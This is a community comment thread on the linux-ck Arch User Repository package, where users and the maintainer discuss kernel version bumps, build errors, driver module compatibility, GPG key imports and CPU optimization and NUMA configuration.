mrturcot commented on 2017-05-20 05:30 Hey, I'm getting an error when updating with nvidia-ck installed... :: nvidia-ck: installing linux-ck (4.11.1-2) breaks dependency 'linux-ck<4.11' More info - Please help... I'm stuck, thanks.
graysky commented on 2017-05-20 01:37 Bump to v4.11.1-2 Changelog: fix pre-made config for cpu type Commit:
graysky commented on 2017-05-20 01:26 @mrkline - It's not a dumb question at all. Mistake on my part. Fixed in 4.11.1-2. Thank you for the report.
mrkline commented on 2017-05-20 00:18
graysky commented on 2017-05-19 22:14
QuartzDragon commented on 2017-05-15 05:38 Do you have the PKGBUILD for 4.11 sitting around? I would love to test it. :)
graysky commented on 2017-05-14 15:46 The major show-stopper at the moment is the nvidia drivers. The kernel builds fine, but I don't want to mess up users of nvidia-xxx.
hekel commented on 2017-05-14 14:49 @graysky I see, thanks. I've only recently started using your repo/pkgbuild again. I guess I spoiled myself by building my own ASAP for so long.
graysky commented on 2017-05-14 14:19 @hekel - and see (threads titled Kernel 4.11 status).
hekel commented on 2017-05-14 13:25
graysky commented on 2017-05-14 12:20 Bump to v4.10.16-1 Changelog: Commit:
monotykamary commented on 2017-05-13 10:49 There is one for 340xx in the nvidia forums, but I haven't found one for 304xx.
graysky commented on 2017-05-12 21:59 Link to a patch for 304xx and 340xx?
monotykamary commented on 2017-05-12 21:31 @graysky Gotcha. For dkms, virtualbox-host-dkms builds correctly here. nvidia-dkms requires a MODULE_LICENSE edit for nvidia-drm/nvidia-drm-linux.c. I have not tested broadcom.
graysky commented on 2017-05-12 19:09 @monotykamary - I need to verify that all broadcom, nvidia-xxxx, and vbox modules build against 4.11.x before I bump it.
keepitsimpleengr commented on 2017-05-11 14:32 nvidia-ck-sandybridge: installing nvidia-utils (381.22-1) breaks dependency 'nvidia-utils=378.13'
graysky commented on 2017-05-08 18:31 Bump to v4.10.15-1 Changelog: Commit:
graysky commented on 2017-05-03 18:03 Bump to v4.10.14-1 Changelog: Commit:
graysky commented on 2017-04-27 19:12 Bump to v4.10.13-1 Changelog: Commit:
graysky commented on 2017-04-21 22:17 Bump to v4.10.12-1 Changelog: Commit:
artafinde commented on 2017-04-21 14:11 BFQ scheduled for mainline - yoohoo!
graysky commented on 2017-04-18 07:26 Bump to v4.10.11-1 Changelog: Commit:
kyak commented on 2017-04-14 05:29 Having some problems with Docker and linux-ck, posted here:
graysky commented on 2017-04-12 19:02 Bump to v4.10.10-1 Changelog: Commit:
bacondropped commented on 2017-04-08 18:10 Hm, I'm getting an occasional "kernel bug" crash with BFQ enabled on a per-device basis (4.10.8 and 4.10.9 with NUMA enabled). I've disabled BFQ; let's see if it persists.
graysky commented on 2017-04-08 11:21 Bump to v4.10.9-1 Changelog: Commit:
sidro commented on 2017-04-07 18:06
SuperIce97 commented on 2017-04-07 18:03 @sidro: This is just how AUR/Arch packages work. There is no way to "fix" the package. It is expected that you import the gpg keys before you build the package.
sir_lucjan commented on 2017-04-07 18:03 gpg --recv-keys 79BE3E4300411886 gpg --recv-keys 38DBBDC86092693E Code works fine. PEBKAC.
sidro commented on 2017-04-07 18:00 Because the original build script returns errors. ==>. Fix your code.
sir_lucjan commented on 2017-04-07 17:04 @sidro: You're wrong.
SuperIce97 commented on 2017-04-07 17:02 @sidro: How is it wrong?
sidro commented on 2017-04-07 16:59 Greg Kroah-Hartman's signature is wrong. Fix it.
sir_lucjan commented on 2017-04-07 16:25 gpg --recv-keys 79BE3E4300411886 38DBBDC86092693E
sidro commented on 2017-04-07 16:13 ==>.
graysky commented on 2017-03-31 17:58 Bump to v4.10.8-1 Changelog: Commit:
graysky commented on 2017-03-30 11:14 Bump to v4.10.7-1 Changelog: Commit:
graysky commented on 2017-03-26 14:59 Bump to v4.10.6-1 Changelog: Commit:
graysky commented on 2017-03-22 18:33 Bump to v4.10.5-1 Changelog: Commit:
Manjaro won't boot with this kernel. By default, a kernel panic shows up. After adding this line to /boot/grub/grub.cfg: initrd /boot/initramfs-linux-ck-ivybridge.img the kernel boots but cannot startx (with and without nvidia-ck-ivybridge). Does anyone know how to solve this issue?
How do I persistently enable the bfq scheduler? I tried adding "elevator=bfq" to the kernel parameters as suggested by the Arch wiki, but it didn't do anything. Thanks! Update: I just found out that Antergos by default has a script trying to set the scheduler in /etc/udev/rules.d/60-schedulers.rules. So I commented out everything in that file and it's good now; nothing is wrong with linux-ck. I guess Antergos isn't real Arch, eh? :D
Is it possible to include this - - patch in the next PKGREL? It works for me and for people on the freedesktop.org bug tracker, so it should be just fine to include. It's a cherry-pick from the in-development 4.11 kernel, and thus would be useless and safe to remove after you update the package to that version.
- It's not in the official ARCH kernel either. I simply mirror ARCH's config (with the ck changes).
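The Antergos udev rule mentioned above is also the usual way to pin a scheduler persistently once elevator= stops taking effect under blk-mq. A minimal sketch — the file name and the choice of matching only sd[a-z] devices are illustrative, not taken from the actual Antergos file:

```
# /etc/udev/rules.d/60-ioschedulers.rules (hypothetical example)
ACTION=="add|change", KERNEL=="sd[a-z]", ATTR{queue/scheduler}="bfq"
```

The assignment only succeeds on kernels where bfq is actually offered in that device's queue/scheduler file, which is exactly what this thread is debugging.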
The module has either been dropped upstream or we aren't configured to build it... you might want to open up a flyspray against the kernel. When I look at the 4.9 -> 4.10 commit, I don't see that we dropped the config option containing 'serial', though:
cooljay032 commented on 2017-02-28 20:19 It seems the lirc_serial driver is missing!?!
  -- Unit systemd-modules-load.service has begun starting up.
  Feb 28 21:07:41 vdr systemd-modules-load[801]: Inserted module 'acpi_cpufreq'
  Feb 28 21:07:41 vdr systemd-modules-load[801]: modprobe: ERROR: could not find module by name='lirc_serial'
  Feb 28 21:07:41 vdr systemd-modules-load[801]: modprobe: ERROR: could not insert 'lirc_serial': Unknown symbol in module, or unknown parameter (see dmesg)
  Feb 28 21:07:41 vdr systemd[1]: systemd-modules-load.service: Main process exited, code=exited, status=1/FAILURE
  Feb 28 21:07:41 vdr systemd[1]: Failed to start Load Kernel Modules.
SuperIce97 commented on 2017-02-28 00:29 @mrkline That's a bit odd, yeah. nvidia-libgl is now on version 378.13-3 but nvidia-dkms is 378.13-2. You need 378.13-3 for Linux 4.10 support, so I wonder why they haven't pushed that dkms update yet.
nvidia-dkms fails to build against 4.10.1-1. Is there a known workaround? Or do we now have to use nvidia-ck? (I've been using nvidia-dkms with linux-ck for quite a while without any trouble.)
From the build log:
  CC [M] /var/lib/dkms/nvidia/378.13/build/nvidia/nv-vtophys.o
  /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c: In function 'nvidia_cpu_callback':
  /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:213:14: error: 'CPU_DOWN_FAILED' undeclared (first use in this function)
    case CPU_DOWN_FAILED:
  /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:213:14: note: each undeclared identifier is reported only once for each function it appears in
  /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:220:14: error: 'CPU_DOWN_PREPARE' undeclared (first use in this function)
    case CPU_DOWN_PREPARE:
  In file included from /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:15:0:
  /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c: In function 'nv_init_pat_support':
  /var/lib/dkms/nvidia/378.13/build/common/inc/nv-linux.h:391:34: error: implicit declaration of function 'register_cpu_notifier' [-Werror=implicit-function-declaration]
    #define register_hotcpu_notifier register_cpu_notifier
  /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:258:17: note: in expansion of macro 'register_hotcpu_notifier'
    if (register_hotcpu_notifier(&nv_hotcpu_nfb) != 0)
  /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c: In function 'nv_teardown_pat_support':
  /var/lib/dkms/nvidia/378.13/build/common/inc/nv-linux.h:388:36: error: implicit declaration of function 'unregister_cpu_notifier' [-Werror=implicit-function-declaration]
    #define unregister_hotcpu_notifier unregister_cpu_notifier
  /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:283:9: note: in expansion of macro 'unregister_hotcpu_notifier'
    unregister_hotcpu_notifier(&nv_hotcpu_nfb);
  CC [M] /var/lib/dkms/nvidia/378.13/build/nvidia/os-interface.o
  cc1: some warnings being treated as errors
  make[2]: *** [scripts/Makefile.build:294: /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.o] Error 1
  make[2]: *** Waiting for unfinished jobs....
  make[1]: *** [Makefile:1494: _module_/var/lib/dkms/nvidia/378.13/build] Error 2
  make[1]: Leaving directory '/usr/lib/modules/4.10.1-1-ck/build'
  make: *** [Makefile:81: modules] Error 2
It seems that virtualbox-ck-host-modules-ivybridge requires a rebuild:
  Failed to insert 'vboxnetadp': Invalid argument
  Failed to insert 'vboxnetflt': Invalid argument
  Failed to insert 'vboxnetadp': Invalid argument
  Failed to insert 'vboxnetflt': Invalid argument
Kernel 4.9.11-1-ck-ivybridge from repo-ck.
Here's a working PKGBUILD for 4.10: updated versioning, commented out the upstream patches, commented out the console loglevel patch (implemented now; I got this option presented to me pre-nconfig). Edit: The loglevel option is now available in nconfig under Kernel Hacking. Edit 2: I also had to comment out the fpu patch on my setup. If you do this, don't forget to comment it out in the sources and prepare sections. Currently writing this from 4.10.0-1-ck, no issues.
@artafinde I've run: cd ~/.cache/pacaur/linux-ck/src/linux-4.9 && make clean (I also tried make mrproper, which is used in the PKGBUILD, and make distclean). I also tried pacaur -Sc to see if that did anything to help. As far as I can tell from skimming the PKGBUILD, in the prepare() step make mrproper comes after the initial patching and should clean the build environment. Oddly enough I had no issues upgrading linux-ck on my laptop, but on my desktop it's having trouble with the prepare() step for some reason. It might be because I upgraded pacaur before upgrading linux-ck and there is a change in PKGBUILD syntax/formatting, or something else. On my laptop I'm pretty sure I upgraded linux-ck and pacaur at the same time, which means the previous version of pacaur handled the installation. That's all I can think of that's different.
I'm getting a couple of errors in the prepare() step:
  The next patch would create the file arch/x86/include/asm/asm-prototypes.h, which already exists! Assume -R?
  [n] The next patch would create the file include/asm-generic/asm-prototypes.h, which already exists! Assume -R? [n]
I keep getting a failure in prepare() regardless of whether I answer 'y' or 'n' to that question and to the "Apply anyway? [n]" question. I've started with a fresh download of everything by deleting the ~/.cache/pacaur/linux-ck/ folder. I've had pacaur redownload everything using this method a few times and the failure persists.
@walkingrobot thanks. I turned the SCSI one on, and I noticed I was able to boot successfully once in a blue moon without udev compiled into my initramfs. Do you know if there is currently a way to boot without udev with an nvme drive in the pcie slot?
@zerophase Here are the NVME options I have:
  CONFIG_NVME_CORE=m  << this one is missing from your list
  CONFIG_BLK_DEV_NVME=m
  # CONFIG_BLK_DEV_NVME_SCSI is not set
  CONFIG_NVME_FABRICS=m
  CONFIG_NVME_RDMA=m
  CONFIG_NVME_TARGET=m
  CONFIG_NVME_TARGET_LOOP=m
  CONFIG_NVME_TARGET_RDMA=m
  CONFIG_NVMEM=m
Does anyone know which NVME switches I should turn on in the kernel? I turned on CONFIG_BLK_DEV_NVME and CONFIG_NVME_TARGET. I just left NVME_TARGET_LOOP and CONFIG_BLK_DEV_NVME_SCSI off. Are there any other NVME settings I should turn on?
With linux-ck-core2 4.9.3-1 and nvidia-340xx-ck-core2 340.101-3 I cannot start the X server. I get the error "Error: driver Nvidia is already registered. Aborting". It's no problem for me to stay with linux 4.8; this is just a warning for those wishing to upgrade.
Both of my machines failed to compile linux-ck 4.9.3 with GCC 6.3.1. Has anyone got the same issue?
  <-Log Start-------------->
  LD fs/built-in.o
  ==> ERROR: A failure occurred in build(). Aborting...
  ==> ERROR: Makepkg was unable to build linux-ck.
  ==> Restart building linux-ck ? [y/N]
  ==> ---------------------------------
  <-Log End------------->
SanskritFritz commented on 2017-01-13 21:55 Users of nvidia-304xx have held back the last version anyway, since the current version doesn't work at all :D
graysky commented on 2017-01-13 21:47 Bump to v4.9.3-1 Changelog: Commit: Linux changes: Notes: Users of nvidia-304xx will have to pull the corresponding utils package from [testing] until 4.9 is pushed into [core]. Sorry about the inconvenience, but far more users of linux-ck want the 4.9 series kernel and I didn't want to hold it up any longer.
I have created my own package from this (forked, basically), adding support for Reiser4 and with a config optimized solely for the Dell XPS 9550 laptops (in their various configurations). If it's OK with you, I'd like to name it Linux-CK-Reiser4, with clear text that this is not made by you (in case shit hits the fan); you will of course be credited for the initial package the fork is based on. So I'm basically using your PKGBUILD but with other options, the same patches with a couple added, and grouped as ck-skylake to support your pre-compiled modules at repo-ck. Is this OK?
graysky commented on 2016-12-22 19:02 I updated linux-ck and all its daughter packages (broadcom-ck, nvidia-x-ck, and virtualbox-ck), but currently nvidia-304xx doesn't build without an update to 304.134, and nvidia-304xx-utils in [extra] is stuck on 304.132. This means I can't push the 4.9 update until our devs put 304.134 in the repos.
graysky commented on 2016-12-22 08:38 @BS - Yes, I saw it. Just need to verify that all modules build OK. Stay tuned.
BS86 commented on 2016-12-22 07:29 4.8.15-2 fails because it's trying to call /bin/sh during the build:
  Cyclomatic Complexity 2 sound/core/hwdep.c:snd_hwdep_proc_read
  Cyclomatic Complexity 1 sound/core/hwdep.c:alsa_hwdep_init
  Cyclomatic Complexity 1 sound/core/hwdep.c:alsa_hwdep_exit
  make[2]: /bin/sh: Command not found
  make[2]: *** [scripts/Makefile.build:427: sound/core/snd-hwdep.o] Error 127
  make[1]: *** [scripts/Makefile.build:440: sound/core] Error 2
  make: *** [Makefile:974: sound] Error 2
  ==> ERROR: A failure occurred in build(). Aborting...
blitz commented on 2016-12-18 23:07 @graysky - The kernel config allows for menu-driven cpu arch selection with minimal interaction and pre-selected MNATIVE. (Taken from my own PKGBUILD:)
  _CPU_NATIVE=y
  ...
  ### Optionally set processor type for kernel
  if [ -n "${_CPU_NATIVE}" ]; then
    msg "Setting cpu arch to gcc native..."
    if [ "${CARCH}" = "x86_64" ]; then
      sed -i -e 's/^CONFIG_GENERIC_CPU=y/# CONFIG_GENERIC_CPU is not set/' \
          -i -e 's/^# CONFIG_MNATIVE is not set/CONFIG_MNATIVE=y/' ./.config
    else
      sed -i -e 's/^CONFIG_M686=y/# CONFIG_M686 is not set/' \
          -i -e 's/^# CONFIG_MNATIVE is not set/CONFIG_MNATIVE=y/' ./.config
    fi
  fi
- The menu is quite nice! Hopefully I can stop messing around in nconfig soon. On that note, is it possible to automate the selection? I tried adding a `CONFIG_MNATIVE=y` line to config.x86_64, but I was still prompted when I ran makepkg. Also, enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz needs its SHA updated.
Yes, the lack of optimizations without -march=native is my worry! (I know this seems false, but it is true...) Hence, any modification is welcome, even if it means pressing some keys. My doubt is another one: whoever builds this package from the AUR wants, I imagine, the best optimizations overall, so why is "-march=native" not the default choice?
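blitz's sed calls can be exercised on a throwaway file to see exactly what they do to the config. A minimal sketch; the two option lines are the x86_64 pair from his snippet, and the file name config.sample is illustrative:

```shell
# Stand-in for the kernel .config, containing just the two lines the
# x86_64 branch of blitz's snippet rewrites
cat > config.sample <<'EOF'
CONFIG_GENERIC_CPU=y
# CONFIG_MNATIVE is not set
EOF
# Disable the generic CPU option and enable GCC-native optimizations,
# using the same substitutions as the PKGBUILD snippet
sed -i -e 's/^CONFIG_GENERIC_CPU=y/# CONFIG_GENERIC_CPU is not set/' \
       -e 's/^# CONFIG_MNATIVE is not set/CONFIG_MNATIVE=y/' config.sample
cat config.sample
```

Note that a hand-added CONFIG_MNATIVE=y line can still be overridden when make (n)config re-resolves symbol dependencies, which may explain the prompting the commenter observed.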
A modification I am considering is to have the AUR package provide unmodified config files for x86_64 and for i686 with respect to the gcc patch. What this means is that whenever you build linux-ck yourself, makepkg (or, I am assuming, your AUR helper) will pause and wait for you to select from the list of CPU optimizations (the default being a simple enter key). This will circumvent the need to modify the PKGBUILD to enable the nconfig option, and the subsequent poking around in nconfig itself. Potentially way faster and easier for the user.
1) How do people feel about this?
2) Will the added interactivity break AUR helpers (I am a pure makepkg person myself)?
Example output:
  % makepkg -src
  ==> Making package: linux-ck 4.8.15-2 (Sun Dec 18 05:42:02 EST 2016)
  ...
  Processor family
    1. AMD Opteron/Athlon64/Hammer/K8 (MK8)
    2. AMD Opteron/Athlon64/Hammer/K8 with SSE3 (MK8SSE3) (NEW)
    3. AMD 61xx/7x50/PhenomX3/X4/II/K10 (MK10) (NEW)
    4. AMD Barcelona (MBARCELONA) (NEW)
    5. AMD Bobcat (MBOBCAT) (NEW)
    6. AMD Bulldozer (MBULLDOZER) (NEW)
    7. AMD Piledriver (MPILEDRIVER) (NEW)
    8. AMD Steamroller (MSTEAMROLLER) (NEW)
    9. AMD Jaguar (MJAGUAR) (NEW)
    10. Intel P4 / older Netburst based Xeon (MPSC)
    11. Intel Atom (MATOM)
    12. Intel Core 2 (MCORE2)
    13. Intel Nehalem (MNEHALEM) (NEW)
    14. Intel Westmere (MWESTMERE) (NEW)
    15. Intel Silvermont (MSILVERMONT) (NEW)
    16. Intel Sandy Bridge (MSANDYBRIDGE) (NEW)
    17. Intel Ivy Bridge (MIVYBRIDGE) (NEW)
    18. Intel Haswell (MHASWELL) (NEW)
    19. Intel Broadwell (MBROADWELL) (NEW)
    20. Intel Skylake (MSKYLAKE) (NEW)
  > 21. Generic-x86-64 (GENERIC_CPU)
    22. Native optimizations autodetected by GCC (MNATIVE) (NEW)
  choice[1-22?]:
graysky commented on 2016-12-18 10:07 @SuperIce97 @mrkline - Good points about usability and about the niche population with aged hardware. I reverted the commit removing native, updating to 4.8.15-2 without bumping the pkgver, since I don't want to rebuild for [repo-ck]; this change has zero impact on the repo packages.
QuartzDragon commented on 2016-12-18 06:20 @mrkline @SuperIce97 Also agreed! :) mrkline commented on 2016-12-18 05:29 +1 for bringing back `-march=native`. If you look at what flags are actually passed to the actual compiler (cc1), it provides much more machine-specific information (e.g., cache size, etc.) than `-march=<CPU family>`. As other users have suggested, it seems like there are workarounds for CPUs where it caused trouble. Even if workarounds don't exist, why remove the option from *all* users for the sake of a minority? A simple warning to avoid the flag for the few setups where it causes trouble should suffice. SuperIce97 commented on 2016-12-17 21:02 Is there anything wrong with the version of your patch before the last commit that removed the native option? If you choose native, it automatically gives you the option for P6 NOPS but it's disabled by default. I think that's a pretty safe way to do it. The help message also has the pretty straightforward message of "Say Y if you have Intel CPU newer than Pentium Pro, N otherwise." at the end, so I believe that anyone who enables Native optimizations would know what to do there. For the issue with Atom CPUs having issues when set to native, you could just add "[causes issues on some Atom CPUs]" to the name of the native option. I don't think this needs to be too complex. graysky commented on 2016-12-17 19:57 @SuperIce97 - I am not skilled enough to implement the logic for the X86_P6_NOP needed. While true that the native option may pass more tokens to make, if you look at the unpatched Makefile for a selection of core2, they are merely passing march=core2 option[1]. 1. SuperIce97 commented on 2016-12-17 19:53 Also, I noticed that on my SandyBridge laptop, march=native enables a ton more instructions than march=sandybrdige (my CPU is a 2630QM which is a SandyBridge). 
That means that we are not getting the full potential by specifying an arch vs. the native arch.

SuperIce97 commented on 2016-12-17 19:40
Looking at issue #17 on the gcc patch's GitHub page, though, I don't think it would be that difficult to enable native optimizations and just have X86_P6_NOP as an additional option, like tpruzina suggested. The reason I prefer using native instead of the specific arch is that some lower-end CPUs (at least with Intel) don't seem to actually support every instruction of their arch for some reason. I used to have a Chromebook C720 with the Haswell Celeron 2955U (I now have a C740 with a Broadwell Celeron 3205U) and I was using the Haswell kernel until it decided that it wouldn't boot (not sure if a change in the kernel or gcc caused it; it was a long time ago and I was too lazy to hunt down the issue) if I compiled it with Haswell. With native, on the other hand, the kernel worked just fine. Would it be possible to reimplement march=native but have the extra option configurable, as suggested by tpruzina?

@Rainmaker - I like to use the official PKGBUILD as a template for this one since it minimizes both the chance of errors and my time to keep it in sync. Plus, I think many might not want the extra bulk of the headers package since it's only really needed to build modules. Not sure what you mean by split out the config.

@BSB6 - It's the holidays; people travel... it seems to get like this pretty consistently this time of year.

First of all, thank you for being very on top of all updates. If I may suggest two improvements:
- You can build multiple packages in a single PKGBUILD. Because linux-ck and linux-ck-headers are likely to be installed together, may I suggest merging both packages into a single PKGBUILD. Building multiple packages in the same PKGBUILD is something that, for example, clion does. Effectively, it is setting pkgname= to a space-separated list.
- Could you split out the config?
Each time I do a git pull, I need to open up the PKGBUILD and edit the parameters. By having a separate configuration file, I can set up git to ignore that file (with assume-unchanged), which saves me from having to set the parameters over and over.

There is a problem with GPG signature verification:

==> Validating source files with sha256sums...
    linux-4.8.tar.xz ... Passed
    linux-4.8.tar.sign ... Skipped
    patch-4.8.14.xz ... Passed
    patch-4.8.14.sign ... Skipped
    patch-4.8-ck8.xz ... Passed
    enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz ... Passed
    config.x86_64 ... Passed
    config ... Passed
    99-linux.hook ... Passed
    linux.preset ... Passed
    change-default-console-loglevel.patch ... Passed
    net_handle_no_dst_on_skb_in_icmp6_send.patch ... Passed
==> Verifying source file signatures with gpg...
    linux-4.8.tar ... FAILED (error during signature verification)
    patch-4.8.14 ... FAILED (error during signature verification)
==> ERROR: One or more PGP signatures could not be verified!

The mainline kernel does include the msr module, as does basically every kernel in the main and AUR repos (including this one). If you enable nconfig for this kernel, you can see under "Processor Type and Features -> /dev/cpu/*/msr - Model-specific register support" that msr is indeed enabled as a kernel module. Perhaps your device does not support msr? (I have an old Intel Atom machine that I use as a micro server that does not support msr and thus does not support i7z, which I would have liked to be able to use.)

Update to linux-ck-core2 4.8.9-1/2 from the repo broke my system. Boot fails because my grub configuration (which used to work up to 4.8.6) searches for /boot/vmlinuz-linux-ck, while with 4.8.9 I got /boot/vmlinuz-linux-ck-core2. After fixing it on the grub command line, the boot fails again complaining that /lib/modules/4.8.9-2-ck-core2/modules.devname is missing, while the file itself is present. The boot media is an ext4 SSD.
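The assume-unchanged approach mentioned above can be sketched in a throwaway repo (note the flag is per-clone and is silently dropped by some git operations, so it is a convenience, not a guarantee):

```shell
# Demo in a throwaway repo: mark a tracked file assume-unchanged so local
# edits to it are ignored by status/pull, then revert the flag.
tmp=$(mktemp -d) && cd "$tmp"
git init -q
git config user.email you@example.com && git config user.name you
echo 'pkgname=linux-ck' > PKGBUILD
git add PKGBUILD && git commit -qm init

git update-index --assume-unchanged PKGBUILD
git ls-files -v        # assume-unchanged files are listed with a lowercase 'h'
git update-index --no-assume-unchanged PKGBUILD
```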
Should I update something in my system configuration or is the linux-ck-core2 package broken?

- Yes, linux-ck has shipped 99-linux.hook since 4.8.8-2. I posted in the bug report you referenced asking if the hook needs a unique name. Right now linux-ck shares the name with linux, which might be a problem. We can make the change if needed. Thank you for bringing this to my attention.

@QD - Not sure what you mean. You mention errors but provide no output, and you mention references but provide no line numbers. Finally, you mention a scope larger than the PKGBUILD but provide no examples... I can't really act on anything you're reporting. If the references to the vanilla kernel are some variables in the PKGBUILD or linux.{preset,install}, make sure you inspect them in a shell, as many are substitutions that simply haven't been substituted yet. For example, PKGBUILD line 262.

QuartzDragon commented on 2016-11-19 05:48
Hey graysky, I was looking at the PKGBUILD, due to build errors, and there are many references that only apply to the vanilla Arch Linux kernel. And it's not just the PKGBUILD that needs fixing... just letting you know. Cheers, QD

The mainline kernel has some interesting changes with 4.8.8-2 and above. I'm not sure if these should be integrated into the ck kernel, but I would say it's worth a look (mainly some sed cleanups and using a new trigger to generate the initramfs as a post-transaction hook):

graysky commented on 2016-11-15 20:07
Bump to v4.8.8-1
Changelog:
Commit:

rob77 commented on 2016-11-15 09:53
@QuartzDragon didn't think of that, as I have git cloned this package's URL; I just git pull and rebuild the package. I did build the package, so my comment was an FYI for anyone else facing the same issue. But when the next update comes I will delete the file I have locally and re-download it.

QuartzDragon commented on 2016-11-15 07:59
@rob77 Try deleting the file so it can be redownloaded? I did that just in case.
rob77 commented on 2016-11-15 00:25
sha256 check failed on enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz; I had to amend line 74 of the PKGBUILD to cf0f984ebfbb8ca8ffee1a12fd791437064b9ebe0712d6f813fd5681d4840791 to get past the error. Alternatively, double check the sha256sum by running:
sha256sum enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz

Suggestions for your most recent PKGBUILD:
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -118,7 +118,7 @@
   # this as the default choice for it leads to more throughput and power
   # savings as well.
   #
-  #
+  #
   sed -i -e 's/^CONFIG_HZ_300=y/# CONFIG_HZ_300 is not set/' \
     -i -e 's/^# CONFIG_HZ_100 is not set/CONFIG_HZ_100=y/' \
     -i -e 's/^CONFIG_HZ=300/CONFIG_HZ=100/' .config
@@ -149,7 +149,7 @@
   # modprobe configs
   zcat /proc/config.gz > ./.config
   else
-  warning "You kernel was not compiled with IKCONFIG_PROC!"
+  warning "Your kernel was not compiled with IKCONFIG_PROC!"
   warning "You cannot read the current config!"
   warning "Aborting!"
   exit

WFV commented on 2016-11-05 00:55
4.8.5-3 and 4.8.6-1 ck-piledriver: Virtualbox guests are sluggish to the point of being unusable (and a WinXP guest blue-screens at launch). The problem isn't present in the stock kernel 4.8.6-1; all guests function normally. (Asus M5A88-M, FX8350 AM3+). No other host problems noticed in either ck rev. EDIT: the problem persists in 4.8.6-2 ck-piledriver. Does it have to do with MuQSS and CGROUPS shared real time (for virtualbox)?

- This sort of report is not very useful without a comparison back to the ARCH kernel of the same version at a minimum. As always, make sure that whatever you're experiencing is reproducible and not present on the non-ck kernel of the same version and report to CK's blog.
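For checksum mismatches like the one rob77 reports, editing the sum by hand works, but the sums can also be regenerated or verified mechanically. The demo below hashes a stand-in file so it is self-contained; `updpkgsums` is the real tool (from pacman-contrib) for rewriting the PKGBUILD's checksum arrays in place:

```shell
# Verify a downloaded file against the checksum recorded in the PKGBUILD.
# A stand-in empty file is hashed here so the example runs anywhere.
printf '' > sample.patch.gz
sha256sum sample.patch.gz
# In the real case, from the directory containing the PKGBUILD:
#   updpkgsums      # regenerate all checksum arrays (pacman-contrib)
#   sha256sum enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz
```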
I'm getting this msg in the journal log with the latest version:
BFQ WARNING:last 4611686022722355494 budget 13835058059577131310 jiffies 4294967598 diff 4611686018427387904

@Saren - Correct: dual socket users will need to build from the AUR since NUMA is disabled by default (recommended by CK).

@QuartzD - Yes, it would be... I currently build 20 different package sets for [repo-ck] and toggling this on/off would double that to 40 and only serve to confuse users. After all, what percentage of [repo-ck] users have a dual socket motherboard?

@SuperIce and @QuartzD - Yes, corrected in 4.8.5-3.

I was one of the people who had issues with NUMA on an AMD FX 8100. About 6 months ago I changed to an i7 6700 and disabled NUMA. No issues so far. I did have btrfs corruption with linux-ck on early MuQSS versions (v110 I think), so I was a late adopter, but it is now running pretty stable for days. I think the NUMA issues were related to the AM3+ socket.

mlc commented on 2016-10-27 04:28
I've been running linux-ck with NUMA disabled for about two weeks. I haven't yet experienced any problems with my Skylake CPU.

graysky commented on 2016-10-26 21:16
@QD - It's a small increase using a make endpoint in my experience (see the flyspray I note in the PKGBUILD comments). It could be that other endpoints reveal more substantial gains as well. In any case, NUMA is really for servers with multiple sockets; my understanding is that it has no point on a single socket motherboard. Linux-ck had it disabled for a long time until some combination of upstream/BFS + NUMA disabled was believed to be responsible for problems, which is when I disabled the code that disables it. Now that MuQSS has replaced BFS, this may not be the case any more. Several users have posted to the AUR reporting stability with it disabled, as is my experience as well.

QuartzDragon commented on 2016-10-26 20:50
How much of a speed increase does disabling NUMA actually give, anyway? I've never really felt the difference.
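The NUMA toggle being discussed is, mechanically, just a one-line sed against the generated .config, in the same style as the HZ seds the PKGBUILD already uses (a sketch only; a real build would still re-resolve dependent symbols with a `make oldconfig`-style pass afterwards):

```shell
# Flip CONFIG_NUMA off in a kernel .config, mirroring the PKGBUILD's sed style.
# A one-line stand-in .config is created so the demo is self-contained.
printf 'CONFIG_NUMA=y\n' > .config
sed -i -e 's/^CONFIG_NUMA=y/# CONFIG_NUMA is not set/' .config
grep NUMA .config    # now reads: # CONFIG_NUMA is not set
```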
graysky commented on 2016-10-26 19:17
Greg just tagged 4.8.5-rc1 and has it scheduled for release on Friday at noon UTC[1]. We can give disabling NUMA a whirl in 4.8.5-1 if there are no reports linking this setting to bad behavior with MuQSS (I am not experiencing anything bad on my Haswell).
1.

metaphorex0 commented on 2016-10-26 10:45
I've been running linux-ck with NUMA disabled since you added that option back to the PKGBUILD. I've had 0 issues so far.

graysky commented on 2016-10-25 15:49
I can, but I would like to get some additional feedback from others who build with NUMA disabled since it caused problems in the past. I too have it disabled on my workstation without ill effects. Can other AUR users please comment: if you have NUMA disabled, are you running a stable 4.8.4-4?

@mono - the difference between the AUR and [repo-ck] right now is that the AUR uses 4.8.4-3, which has ck3 (MuQSS), whereas [repo-ck] uses 4.8.4-1 with ck1 (bfs). I have a dual core system that black screened on booting with ck3 last I checked, but there are two patches in 'pending' that I need to try first. I think if they fix that problem, I will go ahead and build 4.8.4-3 for [repo-ck], but I won't be able to test until tomorrow.

monotykamary commented on 2016-10-23 16:12
There's a bug that completely freezes my computer when opening or playing OpenGL games for a period of time (with NVIDIA), from the linux-ck-ivybridge package group. The AUR linux-ck package doesn't have that bug, but now specifically crashes osu! on wine every time upon load (or a few seconds after load). I haven't seen it crash on any other native or wine application so far.

WINEARCH=win32 WINEPREFIX=~/.wineprefixes/.osu winetricks -q dotnet46 cjkfonts gdiplus wininet winhttp
osu! folder size: 3.9G
Installed Packages: linux-ck, linux-ck-headers, nvidia-ck, broadcom-wl-ck
BFQ and MuQSS enabled; the bug also occurs with the CFQ I/O scheduler.
CPU: Intel Core i5-3317U CPU @ 1.7GHz
GPU: GeForce GT 640M LE

kogone commented on 2016-10-23 00:34
everything has been stable on ivybridge. have built every update so far! hard to keep up =P

graysky commented on 2016-10-22 23:59
Bump to v4.8.4-3
Changelog: Added two key pending patches from CK.
Commit:
